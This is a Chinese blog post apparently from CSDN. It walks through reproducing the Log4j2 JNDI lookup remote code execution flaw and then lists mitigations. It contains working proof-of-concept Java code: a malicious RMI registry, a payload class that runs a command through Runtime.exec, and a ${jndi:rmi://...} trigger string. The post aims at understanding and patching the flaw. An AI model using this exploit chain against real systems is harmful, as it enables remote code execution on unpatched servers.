分析Log4j2漏洞

最新推荐文章于 2024-06-03 15:52:37 发布
最新推荐文章于 2024-06-03 15:52:37 发布
阅读量384 收藏 1
点赞数
文章标签: java 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44684812/article/details/121982519
版权
本文详细介绍了Apache Log4j2的严重漏洞,该漏洞允许远程代码执行。首先,展示了如何搭建环境并利用Lookups功能查询运行信息。接着,通过创建注册中心和入侵代码类演示了入侵详细过程,触发RMI执行代码。然后,提供了官方已修复的Log4j2版本,并给出了临时修复措施,包括设置JVM参数、添加配置文件和升级JDK。最后,建议了防范措施以增强系统安全性。
摘要由CSDN通过智能技术生成

分析Log4j 漏洞

简介

ApacheLog4j2是一个开源的Java日志框架,被广泛地应用在中间件、开发框架与Web应用中。

环境搭建

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

利用漏洞查询运行信息

  • 运行Lookups查询信息

public class TestLog {

    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        String text1  = "${java:vm}";
        logger.info("测试,{}",text1);
        
    }
}
  • Log4j2官网椎间中有Lookups详解 这其实是Lookups的功能如图
    在这里插入图片描述

入侵详细过程:Lookups基于jndi ,jndi 支持 rmi 执行代码

  • 创建注册中心
package controller;

import com.sun.jndi.rmi.registry.ReferenceWrapper;

import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIService {
    public static void main(String[] args) {
        try {
            /**
             * 搞一个注册中心
             * 端口:8888
             */
            LocateRegistry.createRegistry(8888);
            Registry registry = LocateRegistry.getRegistry();
            System.out.println("执行 端口 8888");

            /**
             * 注册服务
             * TestObj 自定义类-> 可执行自定义代码
             */
            Reference reference = new Reference("TestObj", "cTestObj", "");
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            // 服务名字
            registry.bind("testName", referenceWrapper);

        } catch (RemoteException | NamingException | AlreadyBoundException e) {
            e.printStackTrace();
        }
    }
}
  • 创建入侵代码类
package controller;

public class TestObj {
    static {
        try {
        // 打开计算机
            String cmds = "calc";
            Runtime.getRuntime().exec(cmds);
        } catch ( Exception e ) {
            e.printStackTrace();
        }
    }
}
  • 运行
package controller;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class TestLog {

    public static final Logger logger = LogManager.getLogger();
    public static void main(String[] args) {
        // 在当前网站后台执行
        String text  = "${jndi:rmi://localhost:8888/testName}";
        logger.info("测试,{}",text);

    }
}
  • 执行结果
    在这里插入图片描述

修复方式(今天我在运行时官方已经修复)

  • 未修复之前的影响范围为Apache Log4j 2.x <= 2.15.0-rc1

建议

  • 添加jvm启动参数-Dlog4j2.formatMsgNoLookups=true;
  • 在应用classpath下添加log4j2.component.properties配置文- 件,文件内容为log4j2.formatMsgNoLookups=true;
  • JDK使用11.0.1、8u191、7u201、6u211及以上的高版本;
  • 部署使用第三方防火墙产品进行安全防护。
杰拉德·皮克·谢
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现
玄道的网安博客
01-28 4999
漏洞概述 Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。 环境搭建 这里使用vulhub来搭建环境 https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645 进入目录并启动环境 cd vulhub-master/log4j/CVE-2017-5645/ docker-...
log4j2漏洞分析
cjdgg的博客
04-11 6766
log4j2漏洞分析环境布置前言 环境布置 和前面的JNDI注入时用的代码差不多 package Log4j2; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; public class log4j { private static final Logger logger = LogManager.getLogger(log4j.class); public stat
Web网络安全-----Log4j高危漏洞原理及修复_log4j漏洞是什么
最新发布
weixin_42340783的博客
06-03 1220
Log4j 即 log for java(java的日志) ,是Apache的一个开源项目,通过使用Log4j,我们可以控制日志信息输送的目的地是控制台、文件、GUI组件,甚至是套接口服务器、NT的事件记录器、UNIX Syslog守护进程等;我们也可以控制每一条日志的输出格式;通过定义每一条日志信息的级别,我们能够更加细致地控制日志的生成过程。最令人感兴趣的就是,这些可以通过一个配置文件来灵活地进行配置,而不需要修改应用的代码。
Log4j2 高危漏洞分析
石宗昊的博客
12-13 2593
博主其他文章 Apache Log4j2 远程代码执行高危漏洞 解决方案 视频出自 https://space.bilibili.com/1707194509?spm_id_from=333.788.b_765f7570696e666f.2 相关视频 Log4j高危漏洞!具体原因解析!全网第一! Log
Log4j2远程代码执行漏洞分析及例子
qq_38008721的博客
12-11 1364
0x00 介绍 Log4j2Java开发常用的日志框架,该漏洞触发条件低,危害大,由阿里云安全团队报告(莫羽师傅挖到的) 分配CVE编号:CVE-2021-44228 CVSS评分:10.0(最高只能10分) POC比较简单 public static void main(String[] args) throws Exception { logger.error("${jndi:ldap://127.0.0.1:1389/badClassName}"); } POC虽然简单,但是
Log4j2漏洞复现与分析
xiaolinzi176的博客
12-12 3067
漏洞复现: 结果如下: 可见并不是打印的param具体参数信息,而是打印了服务器版本信息,这样就会产生注入的漏洞,此次漏洞就是由于JNDI导致的,下面介绍下具体的JNDI注入 JNDI:RMI注入 在jdk8u1217u1316u141版本开始默认com.sun.jndi.rmi.object.trustURLCodebase设置为false,rmi加载远程的字节码不会执行成功。 ...
log4j2漏洞检测工具
05-07
2. **深度分析**: 工具会深入分析代码,找出所有使用Log4j2的地方,特别是那些可能接收用户输入或网络数据的地方,这些地方是漏洞可能被触发的关键点。 3. **风险评估**: 工具能够评估每个检测到的实例的风险等级,...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
log4j log4j2 2.15.0漏洞解决
12-10
《深入解析Log4j与Log4j2 2.15.0漏洞及解决方案》 在信息技术领域,日志记录是系统监控、故障排查和安全分析的重要环节。Log4j和Log4j2作为Java平台广泛使用的日志框架,其性能高效、功能强大,深受开发者喜爱。...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
扫描log4j2 版本扫描log4j2 版本
12-16
Log4j2是一款广泛使用的Java日志记录框架,它为开发者提供了强大的日志管理和分析功能。然而,随着技术的发展,某些版本的Log4j2被发现存在严重的安全漏洞,这使得恶意攻击者有可能利用这些漏洞进行远程代码执行...
log4j2核弹级漏洞原理和分析
热门推荐
wx的博客
12-11 2万+
log4j2漏洞原理和分析起因漏洞问题重现依赖常规的日志写法lookupsJndi Lookup漏洞补救漏洞解决 起因 这两天被log4j2漏洞给刷屏了,就像下面这样 但是很少有人提及这个漏洞到底是怎么回事儿。log4j2最为非常顶尖的日志框架,怎么会出现这种级别的漏洞呢?了解过漏洞的原理之后我发现,这应该算是一种低级漏洞了。原理就是JNDI代码注入。不过我也是先刷到了大都督的视频才了解了原因的Log4j高危漏洞!具体原因解析!全网第一!,不得不说,大都督还是叼。 漏洞问题重现 依赖 首先,先码一下依赖
Apache Log4j2 漏洞原理
m0_49025459的博客
06-26 2006
Apache Log4j被发现存在一处任意代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。经验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响。
一文读懂面试官都在问的Log4J2漏洞
YangYubo091699的博客
04-11 5578
​ Apache log4j2-RCE 漏洞是由于Log4j2提供的lookup功能下的JndiLookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的信息进行判断,导致Log4j2请求远程主机上的含有恶意代码的资源 并执行其中的代码,从而造成远程代码执行漏洞。​
深入分析Log4j 漏洞
嘉禾笔记
12-16 1万+
几乎每个系统都会使用日志框架,用于记录日志信息,这些信息可以提供程序运行的上下文,但是日志过多也会影响系统的性能,所以好的日志框架应该是可靠,快速和可扩展的。 Apache Log4j2 是一个基于 Java 的日志工具,是Log4j的升级版本,引入了很多丰富的特性,包括高性能,低垃圾收集,插件系统等。目前很多互联网公司以及耳熟能详的公司的系统或者开源框架都在使用Log4j2。 2021.12.7,Log4j首次被发现了一个非常严重的漏洞,在当天Log4j就发布了log4j-2.15.0-rc1,但是12.
Apache Log4j 远程命令执行漏洞CVE-2021-44228
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
12-09 1341
Apache Log4j 远程命令执行漏洞,CVE-2021-44228 通过jndi协议远程调用恶意类执行命令
Log4j漏洞分析
a1290320893的博客
12-13 2612
先看问题: 原本我只是希望logger.info(“hello,{}”,message); 用message来替换{}输出:hello,pxq; 但是假如我的message是${java:os},就是输出设备的具体信息;像这种可能存在隐患; 进一步如果String strings = “${jndi:rmi://127.0.0.1:1899/asd}”; 就会去执行注册中心127.0.0.1:1899中的名为asd的服务,只要用户使用了logger.info()且版本在log4j-api的版本在2.14.0
log4j漏洞详解
weixin_61638307的博客
03-21 3960
JNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,举个例子:它就相当于的你的一个秘书,用了一些手段,你可以去指使他去干一些事情,这个手段就是lookup(),相当于你给秘书一个目标。先给这些名词简单说一下Ldap:你可以将它理解为一个目标数据库。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值